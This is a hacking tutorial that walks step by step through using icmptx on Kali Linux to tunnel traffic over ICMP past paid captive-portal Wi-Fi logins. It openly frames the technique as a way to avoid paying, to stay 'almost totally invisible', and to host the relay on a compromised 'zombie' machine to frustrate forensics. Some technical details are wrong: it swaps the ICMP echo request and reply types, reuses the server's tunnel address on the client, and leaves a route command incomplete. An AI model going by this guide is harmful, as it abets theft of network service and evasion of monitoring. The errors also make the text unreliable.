Evading Wireless Authentication with ICMPTX

Uncategorized

In previous Wi-Fi hacking tutorials, I have shown you ways to create an Evil Twin, to DoS a wireless AP, and to crack WEP and WPA2 passwords, but in this tutorial, I will show you something a little bit different. 

In many restaurants, hotels, airports, airplanes, and cafes, they have open authentication on the wireless AP, but once you connect to the AP, you are sent to a proxy that asks you for your credentials. This is very common in many commercial establishments around the world. To obtain the necessary credentials, there is usually charge associated with it. 

What if you didn’t have a credit card, or forgot your credit card, and needed to access the internet? You still may be able to, if the server accepts ICMP (ping) and you are patient.

In addition, imagine a scenario where you need to stealthily retrieve a file, send a message, or retrieve a message, in say, a cyber espionage or cyber warfare situation, while barely leaving a trace of your activity. This may be your method of choice. 

Note: This is a more advanced technique, so if you are new to hacking, work on some of the more basic techniques before trying this. 

ICMP: The Internet Control Message Protocol 

As you know, ICMP is a protocol that is used detect the presence of a active host. We can determine if a host is active (pay attention, newbies) by simply typing:

kali > ping <IPaddress>

There are multiple types of ICMP messages, but this one is echo request(Type 0) and echo reply (Type 8). Although nearly all of us use ping one time or another, keep in mind that there are other types of ICMP that can come in handy when scanning or hacking systems that may block or drop ICMP Type 0.

If a server accepts ICMP (many won’t as a security precaution), you can use ICMP to bypass the need for authentication via the proxy (that webpage that asks you for credentials). Because it is very slow, I don’t recommend this for daily use, but in a pinch, this can be a very innovative way to get your email when you don’t want to buy access to the service, or—you want to access the web without leaving a trace. 

Step 1: Fire Up Kali & Download Icmptx

To begin, let’s fire up Kali Linux and download icmptx. Since icmptx is in the Kali repository, all we need to do is:

kali > apt-get install icmptx

This will install icmptx to your Kali operating system.

Step 2: Getting Help

Next, let’s take a look at the help file for icmptx. Simply type:

kali > icmptx

This help screen will appear. As you can see, the syntax is very straightforward and simple. Unfortunately, the implementation is not.

When we downloaded icmptx, it installed a manual page, so let’s take a look at it by typing:

kali > man icmptx 

The manual page doesn’t offer much more information than the help page.

Step 3: Server Side Proxy

The way icmptx works is that you need to set up a proxy/server between you, the client, and the intended target on the web. First, let’s set up the proxy/server.

To set up the up the proxy/server, the syntax is simple:

kali > icmptx -s 10.0.0.1​​

This points to the server/proxy at the IP address 10.0.0.1. This is only an example; you will need to replace this IP with whatever the target IP address you are trying to connect to.

Step 4: Tunneling

Next, we need to set up a tunnel. A tunnel provides a packet transmission and reception place for user-based applications. Since icmptx is a user-based application, we need to set up a tunnel to send and receive packets, in this case, ICMP packets.

We can check to see whether our kernel supports tunneling by typing:

kali > ifconfig tun0 

This response indicates that our Debian operating system (that Kali is built on) supports tunneling. Let’s set up a tunnel on the server now. 

kali > ifconfig tun0 mtu 65535 up 10.0.0.1 netmask 255.255.255.0 

Step 5: IP Forwarding 

Next, we need to set up this server to first, ignore ICMP requests and second, forward IP traffic. If we didn’t tell the kernel to ignore ICMP requests, it would respond with a echo reply (Type 8), which is the normal response. We don’t want that. We want the ICMP traffic to enter the server and pass right through it.

We can tell the kernel to ignore ICMP traffic by typing: 

kali > echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all 

Then we need to forward IP traffic, by typing: 

kali > echo 1 > /proc/sys/net/ipv4/ip_forward  

Step 6: Set Up the Client 

Now, let’s set up our client. This is the system we will be using to access the Internet from. We need to install icmptx on this system as well, but here we will be using the client and not the server setup.

To do so, type: 

kali > icmptx -c <IP address of the proxy/server> 

kali > icmptx -c 76.23.54.12  

Then we need to establish a tunnel on this system as well.

kali > ifconfig tun0 mtu 65535 up 10.0.0.1 netmask 255.255.255.0

Next, we need to set up a route to the proxy. 

kali >route del default 

kali > route add host 76.23.54.12 gateway 192.168.1.1 dev 

Lastly, we need to set a route through the tunnel we created (tun0) to the server on the web we want to access. 

kali > route add default gw 10.0.0.1 tun0 

Now, when you want to access that site on the web, you can do so without authenticating and be almost totally invisible! 

Although using icmptx is probably not a practical means of accessing the web on a daily basis, in a pinch or under severely clandestine circumstances, it will get you past web-based authentication and leave almost no trail. Few, if any, security administrators will be looking for ICMP traffic to trace your activities and, since you did not have to authenticate, your trail is almost invisible. In addition, if you set up the server on a zombie system, the only trail will lead back to the server/zombie without a highly skilled forensic investigation.